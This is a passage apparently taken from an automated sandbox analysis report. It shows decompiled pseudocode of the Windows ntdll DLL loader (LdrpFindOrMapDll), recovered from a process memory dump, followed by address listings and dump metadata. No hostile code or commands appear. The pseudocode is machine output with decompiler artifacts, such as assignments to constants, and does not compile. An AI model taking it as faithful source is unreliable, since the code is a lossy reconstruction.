										_t320 = _t106;
										 *((intOrPtr*)(_t320 + 4)) = _t320;
										 *_t320 = _t320;
										_t108 = _t418 + 0x60; // 0x60
										_t321 = _t108;
										 *((intOrPtr*)(_t321 + 4)) = _t321;
										 *_t321 = _t321;
										 *((intOrPtr*)(_t418 + 0x68)) = 0;
										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
										_t324 =  *0x7ffe0018;
										_t403 =  *0x7ffe0014;
										_t407 =  *0x7ffe001c;
										while(1) {
											__eflags = _t324 - _t407;
											if(_t324 == _t407) {
												break;
											}
											asm("pause");
											_t324 =  *0x7ffe0018;
											_t403 =  *0x7ffe0014;
											_t407 =  *0x7ffe001c;
										}
										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
										_push(0);
										_push(4);
										_push(_t421 - 0x6c);
										_push(2);
										E00940060( *((intOrPtr*)(_t421 - 0x2c)));
										_t328 =  *(_t421 - 0x6c);
										__eflags = _t328;
										if(_t328 != 0) {
											_t119 = _t418 + 0x6c;
											 *_t119 =  *(_t418 + 0x6c) - _t328;
											__eflags =  *_t119;
										}
										_t121 = _t418 + 0x3c; // 0x3c
										_t414 = _t121;
										_t331 = 0xa24820 + (E0094FAC1(_t401) & 0x0000001f) * 8;
										_t405 =  *((intOrPtr*)(_t331 + 4));
										 *_t414 = _t331;
										 *((intOrPtr*)(_t414 + 4)) = _t405;
										 *_t405 = _t414;
										 *((intOrPtr*)(_t331 + 4)) = _t414;
										_t332 =  *0xa20210; // 0x542b18
										 *_t418 = 0xa2020c;
										 *((intOrPtr*)(_t418 + 4)) = _t332;
										 *_t332 = _t418;
										 *0xa20210 = _t418;
										_t128 = _t418 + 8; // 0x8
										_t333 = _t128;
										_t402 =  *0xa20218; // 0x542b20
										 *_t333 = 0xa20214;
										 *(_t333 + 4) = _t402;
										 *_t402 = _t333;
										 *0xa20218 = _t333;
										E009604F2(_t401, _t402, _t407, _t414, 0xa22200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
										E009602AC(_t402, _t418);
										__eflags =  *(_t421 - 0x58);
										if( *(_t421 - 0x58) != 0) {
											goto L73;
										} else {
											goto L45;
										}
									}
								}
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
								__eflags =  *(_t421 + 0x18) - 0x40000003;
								if( *(_t421 + 0x18) == 0x40000003) {
									_t402 = _t421 - 0x34;
									_t411 = E0099A0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
									__eflags = _t411 - _t401;
									if(_t411 >= _t401) {
										goto L35;
									}
									goto L28;
								}
								goto L35;
							}
							__eflags =  *(_t421 + 0x14) & 0x00000002;
							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
								goto L117;
							}
							_t402 = 0x2000;
							_t303 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *(_t303 + 0x16) & 0x00002000;
							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
								L115:
								__eflags =  *(_t303 + 0x5e) & 0x00000080;
								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
									goto L33;
								}
								_t411 = 0xc0000428;
								goto L28;
							}
							__eflags = _t417 - _t401;
							if(_t417 == _t401) {
								goto L33;
							}
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
								goto L33;
							}
							goto L115;
						}
						_push(_t421 - 0x68);
						_push(_t401);
						_push(_t401);
						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
						_push(3);
						E0094F535(0x4000000e, _t417, __eflags);
						_t355 =  *((intOrPtr*)(_t421 - 0x68));
						__eflags =  *((short*)(_t355 + 0x48)) - 3;
						if( *((short*)(_t355 + 0x48)) <= 3) {
							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
							_push(_t421 - 0x50);
							_push(2);
							_push(_t421 - 0x40);
							_push(1);
							_push(1);
							_t411 = E00941614(0x4000000e);
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
								goto L35;
							}
							__eflags =  *0xa20001;
							if( *0xa20001 != 0) {
								 *0xa29240 =  *0xa29240 + 1;
							}
							L27:
							_t411 = 0xc000007b;
							goto L28;
						}
						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E0093FC90(0xffffffff);
							E0093F9F0( *((intOrPtr*)(_t421 - 0x2c)));
							E0093F9F0( *(_t421 - 0x28));
							E0094E1C6(_t421 - 0x3c);
							_t410 = 0;
							E0094E025(_t402,  *0xa20104, 0,  *((intOrPtr*)(_t421 - 0x30)));
							_t401 = 1;
							L11:
							_t419 = E0094E825( *(_t421 + 8));
							__eflags = _t419 - 2;
							if(_t419 != 2) {
								L54:
								_t411 = E00961C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
								__eflags = _t411;
								if(_t411 < 0) {
									__eflags = _t411 - 0xc0000135;
									if(_t411 == 0xc0000135) {
										__eflags = _t401;
										if(_t401 != 0) {
											_t411 = 0xc000007b;
										} else {
											E00977CC4( *(_t421 + 8));
											E00962D04(0xc0000135,  *(_t421 + 8), 0);
										}
									}
									goto L14;
								}
								__eflags =  *(_t421 + 0xf);
								if( *(_t421 + 0xf) == 0) {
									L84:
									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
									_t416 = 0;
									 *((intOrPtr*)(_t421 - 0x84)) = 0;
									0x840 = 0x40;
									__eflags =  *0xa2924c;
									if( *0xa2924c == 0) {
									}
									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
									_push(0x60);
									_push(5);
									_push(_t421 - 0x94);
									_push(_t421 - 0x88);
									_push(0x100021);
									_t411 = E0093FD74(_t421 - 0x28);
									__eflags = _t411 - _t416;
									if(_t411 < _t416) {
										__eflags = _t411 - 0xc0000034;
										if(_t411 == 0xc0000034) {
											L88:
											_t411 = 0xc0000135;
											goto L31;
										}
										__eflags = _t411 - 0xc000003a;
										if(_t411 != 0xc000003a) {
											goto L31;
										}
										goto L88;
									} else {
										_push( *(_t421 - 0x28));
										_push(0x1000000);
										_push(0x10);
										_push(_t416);
										_push(_t416);
										_push(0xf);
										_t411 = E0093FFB4(_t421 - 0x2c);
										__eflags = _t411 - _t416;
										if(_t411 < _t416) {
											__eflags = _t411 - 0xc0000017;
											if(_t411 != 0xc0000017) {
												__eflags = _t411 - 0xc000009a;
												if(_t411 != 0xc000009a) {
													__eflags = _t411 - 0xc000012d;
													if(_t411 != 0xc000012d) {
														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
														_push(_t421 - 0x50);
														_push(1);
														_push(_t421 - 0x40);
														_push(1);
														_push(1);
														_t288 = E00941614(0xc000007b);
														__eflags = _t288;
														if(_t288 >= 0) {
															__eflags =  *0xa20001;
															if( *0xa20001 != 0) {
																 *0xa29240 =  *0xa29240 + 1;
															}
														}
													}
												}
											}
											goto L30;
										}
										__eflags =  *(_t421 + 0x14) & 0x00001000;
										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
											goto L19;
										}
										_t411 = E00961D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
										__eflags = _t411;
										if(_t411 >= 0) {
											goto L19;
										}
										__eflags = _t411 - 0xc0000225;
										if(_t411 == 0xc0000225) {
											goto L19;
										} else {
											_t401 = 0;
											goto L29;
										}
										goto L54;
									}
								}
								__eflags = _t419 - 2;
								if(_t419 == 2) {
									goto L84;
								}
								_t376 = E0094FA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
								__eflags = _t376;
								if(_t376 == 0) {
									goto L84;
								}
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
								_t411 = 0;
								goto L31;
							}
							_t378 = E0094FA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t378;
							if(_t378 == 0) {
								goto L54;
							}
							goto L13;
						}
						goto L27;
					}
					L10:
					 *((intOrPtr*)(_t421 - 0x60)) =  *_t416;
					 *((intOrPtr*)(_t421 - 0x5c)) =  *((intOrPtr*)(_t416 + 4));
					 *((intOrPtr*)(_t421 - 0x4c)) =  *((intOrPtr*)(_t421 + 0x10));
					goto L11;
				}
			}















































                                                                                                                                                              0x0095e6c1
                                                                                                                                                              0x0095e6c6
                                                                                                                                                              0x0095e6cb
                                                                                                                                                              0x0095e6d0
                                                                                                                                                              0x0095e6d8
                                                                                                                                                              0x0095e6e1
                                                                                                                                                              0x0099fb40
                                                                                                                                                              0x0099fb5a
                                                                                                                                                              0x0099fb5f
                                                                                                                                                              0x0099fb5f
                                                                                                                                                              0x0095e6e7
                                                                                                                                                              0x0095e6f2
                                                                                                                                                              0x0099fb67
                                                                                                                                                              0x0099fb67
                                                                                                                                                              0x0095e6f8
                                                                                                                                                              0x0095e6fa
                                                                                                                                                              0x0095e6fd
                                                                                                                                                              0x0095e700
                                                                                                                                                              0x0095e703
                                                                                                                                                              0x0095e706
                                                                                                                                                              0x0095e70a
                                                                                                                                                              0x0095e70f
                                                                                                                                                              0x0096c259
                                                                                                                                                              0x0096c25e
                                                                                                                                                              0x0096c260
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c272
                                                                                                                                                              0x0096c274
                                                                                                                                                              0x0096c276
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c28c
                                                                                                                                                              0x0096c28e
                                                                                                                                                              0x0096c290
                                                                                                                                                              0x0099fb71
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fb71
                                                                                                                                                              0x0096c296
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095e715
                                                                                                                                                              0x0095e715
                                                                                                                                                              0x0095e718
                                                                                                                                                              0x0095e71e
                                                                                                                                                              0x0095e722
                                                                                                                                                              0x0095e726
                                                                                                                                                              0x0095e72d
                                                                                                                                                              0x0095e739
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095e735
                                                                                                                                                              0x0095e736
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095e736
                                                                                                                                                              0x0095e72d
                                                                                                                                                              0x0095e73d
                                                                                                                                                              0x0095e741
                                                                                                                                                              0x0095ec24
                                                                                                                                                              0x0095ec29
                                                                                                                                                              0x0095ec2b
                                                                                                                                                              0x0095e77f
                                                                                                                                                              0x0095e782
                                                                                                                                                              0x0095e785
                                                                                                                                                              0x0095e785
                                                                                                                                                              0x0095e787
                                                                                                                                                              0x0095e787
                                                                                                                                                              0x0095e78c
                                                                                                                                                              0x0095e78f
                                                                                                                                                              0x0095e795
                                                                                                                                                              0x0099fe2e
                                                                                                                                                              0x0099fe33
                                                                                                                                                              0x0095e79b
                                                                                                                                                              0x0095e7a0
                                                                                                                                                              0x0095e7a6
                                                                                                                                                              0x0099fe3b
                                                                                                                                                              0x0099fe3b
                                                                                                                                                              0x0095e7b3
                                                                                                                                                              0x0095e7b3
                                                                                                                                                              0x0095ec47
                                                                                                                                                              0x0095ec49
                                                                                                                                                              0x0095ec4b
                                                                                                                                                              0x00962a55
                                                                                                                                                              0x00962a5b
                                                                                                                                                              0x0099fbc5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fbc5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00962a61
                                                                                                                                                              0x0095ec51
                                                                                                                                                              0x0095ec5c
                                                                                                                                                              0x0095ec61
                                                                                                                                                              0x0095ec66
                                                                                                                                                              0x0095ec82
                                                                                                                                                              0x0095ec84
                                                                                                                                                              0x0095ec86
                                                                                                                                                              0x0095ec88
                                                                                                                                                              0x0095ed2e
                                                                                                                                                              0x0095ed31
                                                                                                                                                              0x0095ed36
                                                                                                                                                              0x0095ed39
                                                                                                                                                              0x0095ed4c
                                                                                                                                                              0x0095ed57
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095ed57
                                                                                                                                                              0x0095ed3b
                                                                                                                                                              0x0095ed3e
                                                                                                                                                              0x0095ed43
                                                                                                                                                              0x0095ed47
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095ed47
                                                                                                                                                              0x0095ec8e
                                                                                                                                                              0x0095ec94
                                                                                                                                                              0x0095ec95
                                                                                                                                                              0x0095ec96
                                                                                                                                                              0x0095ec99
                                                                                                                                                              0x0095ec9c
                                                                                                                                                              0x0095eca2
                                                                                                                                                              0x0095eca4
                                                                                                                                                              0x0095eca6
                                                                                                                                                              0x0095ed24
                                                                                                                                                              0x0095ed24
                                                                                                                                                              0x0095ed29
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095ed29
                                                                                                                                                              0x0095eca8
                                                                                                                                                              0x0095ecab
                                                                                                                                                              0x0096163f
                                                                                                                                                              0x00961644
                                                                                                                                                              0x00961646
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096164f
                                                                                                                                                              0x00961651
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961651
                                                                                                                                                              0x0095ecb1
                                                                                                                                                              0x0095ecb1
                                                                                                                                                              0x0095ecbb
                                                                                                                                                              0x0099fc49
                                                                                                                                                              0x0099fc4e
                                                                                                                                                              0x0099fc51
                                                                                                                                                              0x0099fc55
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc5b
                                                                                                                                                              0x0099fc62
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc68
                                                                                                                                                              0x0099fc69
                                                                                                                                                              0x0099fc71
                                                                                                                                                              0x0099fc72
                                                                                                                                                              0x0099fc77
                                                                                                                                                              0x0099fc7c
                                                                                                                                                              0x0099fc83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc89
                                                                                                                                                              0x0099fc9b
                                                                                                                                                              0x0099fc9d
                                                                                                                                                              0x0099fca0
                                                                                                                                                              0x0099a0de
                                                                                                                                                              0x0099a0e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099a0e6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099a0e6
                                                                                                                                                              0x0099a0e0
                                                                                                                                                              0x0095ecc1
                                                                                                                                                              0x0095ecd4
                                                                                                                                                              0x0095ecd6
                                                                                                                                                              0x0095ecd9
                                                                                                                                                              0x0095ecdb
                                                                                                                                                              0x00978599
                                                                                                                                                              0x0097859d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fce0
                                                                                                                                                              0x0099fce5
                                                                                                                                                              0x0099fce7
                                                                                                                                                              0x0099fce9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fcef
                                                                                                                                                              0x0099fcef
                                                                                                                                                              0x0099fcf6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fcf6
                                                                                                                                                              0x009785a8
                                                                                                                                                              0x009785a8
                                                                                                                                                              0x009785ab
                                                                                                                                                              0x009785af
                                                                                                                                                              0x0096027b
                                                                                                                                                              0x0096027b
                                                                                                                                                              0x00960281
                                                                                                                                                              0x00960289
                                                                                                                                                              0x0096028e
                                                                                                                                                              0x00960291
                                                                                                                                                              0x00961dbe
                                                                                                                                                              0x00961dc7
                                                                                                                                                              0x00961dc7
                                                                                                                                                              0x0096029a
                                                                                                                                                              0x0096029f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096029f
                                                                                                                                                              0x009785c1
                                                                                                                                                              0x009785c3
                                                                                                                                                              0x009785c5
                                                                                                                                                              0x0099fdf6
                                                                                                                                                              0x0099fdfb
                                                                                                                                                              0x0099fdfb
                                                                                                                                                              0x0099fdfd
                                                                                                                                                              0x0099fdfd
                                                                                                                                                              0x0099fe04
                                                                                                                                                              0x0099fe0d
                                                                                                                                                              0x0099fe0d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fe04
                                                                                                                                                              0x009785cb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009785cb
                                                                                                                                                              0x0095ece1
                                                                                                                                                              0x0095ece6
                                                                                                                                                              0x0095ece9
                                                                                                                                                              0x0099fd7f
                                                                                                                                                              0x0099fd86
                                                                                                                                                              0x0099fdc2
                                                                                                                                                              0x0099fdc2
                                                                                                                                                              0x00960107
                                                                                                                                                              0x00960107
                                                                                                                                                              0x0096010c
                                                                                                                                                              0x00960110
                                                                                                                                                              0x00960123
                                                                                                                                                              0x00960123
                                                                                                                                                              0x0096013b
                                                                                                                                                              0x0096013d
                                                                                                                                                              0x0096013f
                                                                                                                                                              0x0099fdca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00960145
                                                                                                                                                              0x00960148
                                                                                                                                                              0x0096014b
                                                                                                                                                              0x0096014f
                                                                                                                                                              0x0099a0eb
                                                                                                                                                              0x00960155
                                                                                                                                                              0x00960155
                                                                                                                                                              0x00960158
                                                                                                                                                              0x0096015b
                                                                                                                                                              0x00964ebc
                                                                                                                                                              0x00960161
                                                                                                                                                              0x00960164
                                                                                                                                                              0x00960164
                                                                                                                                                              0x00960164
                                                                                                                                                              0x00960167
                                                                                                                                                              0x00960167
                                                                                                                                                              0x00960170
                                                                                                                                                              0x00960176
                                                                                                                                                              0x0096017c
                                                                                                                                                              0x0096017f
                                                                                                                                                              0x0096017f
                                                                                                                                                              0x00960185
                                                                                                                                                              0x0096018a
                                                                                                                                                              0x00960190
                                                                                                                                                              0x00960195
                                                                                                                                                              0x00960199
                                                                                                                                                              0x009601a3
                                                                                                                                                              0x009601a6
                                                                                                                                                              0x009601a8
                                                                                                                                                              0x009601ab
                                                                                                                                                              0x009601ae
                                                                                                                                                              0x009601ae
                                                                                                                                                              0x009601b1
                                                                                                                                                              0x009601b4
                                                                                                                                                              0x009601b6
                                                                                                                                                              0x009601b6
                                                                                                                                                              0x009601b9
                                                                                                                                                              0x009601bc
                                                                                                                                                              0x009601be
                                                                                                                                                              0x009601be
                                                                                                                                                              0x009601c1
                                                                                                                                                              0x009601c4
                                                                                                                                                              0x009601c6
                                                                                                                                                              0x009601cf
                                                                                                                                                              0x009601d2
                                                                                                                                                              0x009601d7
                                                                                                                                                              0x009601dd
                                                                                                                                                              0x009601e3
                                                                                                                                                              0x009601e3
                                                                                                                                                              0x009601e5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fdd1
                                                                                                                                                              0x0099fdd8
                                                                                                                                                              0x0099fddf
                                                                                                                                                              0x0099fde6
                                                                                                                                                              0x0099fde6
                                                                                                                                                              0x009601eb
                                                                                                                                                              0x009601ee
                                                                                                                                                              0x009601f1
                                                                                                                                                              0x009601f2
                                                                                                                                                              0x009601f7
                                                                                                                                                              0x009601f8
                                                                                                                                                              0x009601fd
                                                                                                                                                              0x00960202
                                                                                                                                                              0x00960205
                                                                                                                                                              0x00960207
                                                                                                                                                              0x00960209
                                                                                                                                                              0x00960209
                                                                                                                                                              0x00960209
                                                                                                                                                              0x00960209
                                                                                                                                                              0x0096020c
                                                                                                                                                              0x0096020c
                                                                                                                                                              0x00960218
                                                                                                                                                              0x0096021f
                                                                                                                                                              0x00960222
                                                                                                                                                              0x00960224
                                                                                                                                                              0x00960227
                                                                                                                                                              0x00960229
                                                                                                                                                              0x0096022c
                                                                                                                                                              0x00960231
                                                                                                                                                              0x00960237
                                                                                                                                                              0x0096023a
                                                                                                                                                              0x0096023c
                                                                                                                                                              0x00960242
                                                                                                                                                              0x00960242
                                                                                                                                                              0x00960245
                                                                                                                                                              0x0096024b
                                                                                                                                                              0x00960251
                                                                                                                                                              0x00960254
                                                                                                                                                              0x00960256
                                                                                                                                                              0x00960266
                                                                                                                                                              0x0096026c
                                                                                                                                                              0x00960271
                                                                                                                                                              0x00960275
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00960275
                                                                                                                                                              0x0096013f
                                                                                                                                                              0x00960112
                                                                                                                                                              0x00960116
                                                                                                                                                              0x0096011d
                                                                                                                                                              0x0099a0bf
                                                                                                                                                              0x0099a0cf
                                                                                                                                                              0x0099a0d1
                                                                                                                                                              0x0099a0d3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099a0d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096011d
                                                                                                                                                              0x0099fd88
                                                                                                                                                              0x0099fd8c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fd8e
                                                                                                                                                              0x0099fd93
                                                                                                                                                              0x0099fd96
                                                                                                                                                              0x0099fd9a
                                                                                                                                                              0x0099fdae
                                                                                                                                                              0x0099fdae
                                                                                                                                                              0x0099fdb2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fdb8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fdb8
                                                                                                                                                              0x0099fd9c
                                                                                                                                                              0x0099fd9e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fda4
                                                                                                                                                              0x0099fda8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fda8
                                                                                                                                                              0x0095ecf2
                                                                                                                                                              0x0095ecf3
                                                                                                                                                              0x0095ecf4
                                                                                                                                                              0x0095ecfe
                                                                                                                                                              0x0095ed01
                                                                                                                                                              0x0095ed03
                                                                                                                                                              0x0095ed08
                                                                                                                                                              0x0095ed0b
                                                                                                                                                              0x0095ed10
                                                                                                                                                              0x0099fd3c
                                                                                                                                                              0x0099fd42
                                                                                                                                                              0x0099fd43
                                                                                                                                                              0x0099fd48
                                                                                                                                                              0x0099fd49
                                                                                                                                                              0x0099fd4b
                                                                                                                                                              0x0099fd53
                                                                                                                                                              0x0099fd55
                                                                                                                                                              0x0099fd57
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fd5d
                                                                                                                                                              0x0099fd61
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fd67
                                                                                                                                                              0x0099fd6e
                                                                                                                                                              0x0099fd74
                                                                                                                                                              0x0099fd74
                                                                                                                                                              0x0095ed1f
                                                                                                                                                              0x0095ed1f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095ed1f
                                                                                                                                                              0x0095ed16
                                                                                                                                                              0x0095ed19
                                                                                                                                                              0x0099fcfe
                                                                                                                                                              0x0099fd03
                                                                                                                                                              0x0099fd0b
                                                                                                                                                              0x0099fd13
                                                                                                                                                              0x0099fd1c
                                                                                                                                                              0x0099fd24
                                                                                                                                                              0x0099fd2d
                                                                                                                                                              0x0099fd32
                                                                                                                                                              0x0095e758
                                                                                                                                                              0x0095e760
                                                                                                                                                              0x0095e762
                                                                                                                                                              0x0095e765
                                                                                                                                                              0x00961d5d
                                                                                                                                                              0x00961d79
                                                                                                                                                              0x00961d7b
                                                                                                                                                              0x00961d7d
                                                                                                                                                              0x00977c97
                                                                                                                                                              0x00977c99
                                                                                                                                                              0x00977c9f
                                                                                                                                                              0x00977ca1
                                                                                                                                                              0x0099fbcc
                                                                                                                                                              0x00977ca7
                                                                                                                                                              0x00977caa
                                                                                                                                                              0x00977cb5
                                                                                                                                                              0x00977cb5
                                                                                                                                                              0x00977ca1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00977c99
                                                                                                                                                              0x00961d83
                                                                                                                                                              0x00961d87
                                                                                                                                                              0x0099fb7b
                                                                                                                                                              0x0099fb7b
                                                                                                                                                              0x0099fb85
                                                                                                                                                              0x0099fb87
                                                                                                                                                              0x0099fb8f
                                                                                                                                                              0x0099fb90
                                                                                                                                                              0x0099fb97
                                                                                                                                                              0x0099fb97
                                                                                                                                                              0x00961cbd
                                                                                                                                                              0x00961cc3
                                                                                                                                                              0x00961cc6
                                                                                                                                                              0x00961cc9
                                                                                                                                                              0x00961ccc
                                                                                                                                                              0x00961cce
                                                                                                                                                              0x00961cd6
                                                                                                                                                              0x00961cdd
                                                                                                                                                              0x00961cde
                                                                                                                                                              0x00961cec
                                                                                                                                                              0x00961cee
                                                                                                                                                              0x00961cf0
                                                                                                                                                              0x0099fba7
                                                                                                                                                              0x0099fbad
                                                                                                                                                              0x0099fbbb
                                                                                                                                                              0x0099fbbb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fbbb
                                                                                                                                                              0x0099fbaf
                                                                                                                                                              0x0099fbb5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961cf6
                                                                                                                                                              0x00961cf6
                                                                                                                                                              0x00961cf9
                                                                                                                                                              0x00961cfe
                                                                                                                                                              0x00961d00
                                                                                                                                                              0x00961d01
                                                                                                                                                              0x00961d02
                                                                                                                                                              0x00961d0d
                                                                                                                                                              0x00961d0f
                                                                                                                                                              0x00961d11
                                                                                                                                                              0x0099fbd6
                                                                                                                                                              0x0099fbdc
                                                                                                                                                              0x0099fbe2
                                                                                                                                                              0x0099fbe8
                                                                                                                                                              0x0099fbee
                                                                                                                                                              0x0099fbf4
                                                                                                                                                              0x0099fbfd
                                                                                                                                                              0x0099fc03
                                                                                                                                                              0x0099fc04
                                                                                                                                                              0x0099fc09
                                                                                                                                                              0x0099fc0a
                                                                                                                                                              0x0099fc0c
                                                                                                                                                              0x0099fc13
                                                                                                                                                              0x0099fc18
                                                                                                                                                              0x0099fc1a
                                                                                                                                                              0x0099fc20
                                                                                                                                                              0x0099fc27
                                                                                                                                                              0x0099fc2d
                                                                                                                                                              0x0099fc2d
                                                                                                                                                              0x0099fc27
                                                                                                                                                              0x0099fc1a
                                                                                                                                                              0x0099fbf4
                                                                                                                                                              0x0099fbe8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fbdc
                                                                                                                                                              0x00961d17
                                                                                                                                                              0x00961d1e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961d30
                                                                                                                                                              0x00961d32
                                                                                                                                                              0x00961d34
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc38
                                                                                                                                                              0x0099fc3e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc44
                                                                                                                                                              0x00973566
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00973566
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0099fc3e
                                                                                                                                                              0x00961cf0
                                                                                                                                                              0x00961d8d
                                                                                                                                                              0x00961d90
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961da1
                                                                                                                                                              0x00961da6
                                                                                                                                                              0x00961da8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961db1
                                                                                                                                                              0x00961db4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00961db4
                                                                                                                                                              0x0095e772
                                                                                                                                                              0x0095e777
                                                                                                                                                              0x0095e779
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095e779
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095ed19
                                                                                                                                                              0x0095e747
                                                                                                                                                              0x0095e749
                                                                                                                                                              0x0095e74f
                                                                                                                                                              0x0095e755
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0095e755

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: +T$DLL name: %wZ DLL path: %wZ$LdrpFindOrMapDll$MZER$Status: 0x%08lx$d:\w7rtm\minkernel\ntdll\ldrfind.c$p&T$x&T
                                                                                                                                                              • API String ID: 0-1895180151
                                                                                                                                                              • Opcode ID: 827ba5bda769c7e88277e1f8b66bdbe928f8e6199aaf8984e7635eb016c47edc
                                                                                                                                                              • Instruction ID: 628700b259676c2fe6f556dcd6c264cad53cd5cda7c3ba07e5c67fdb4434fd3a
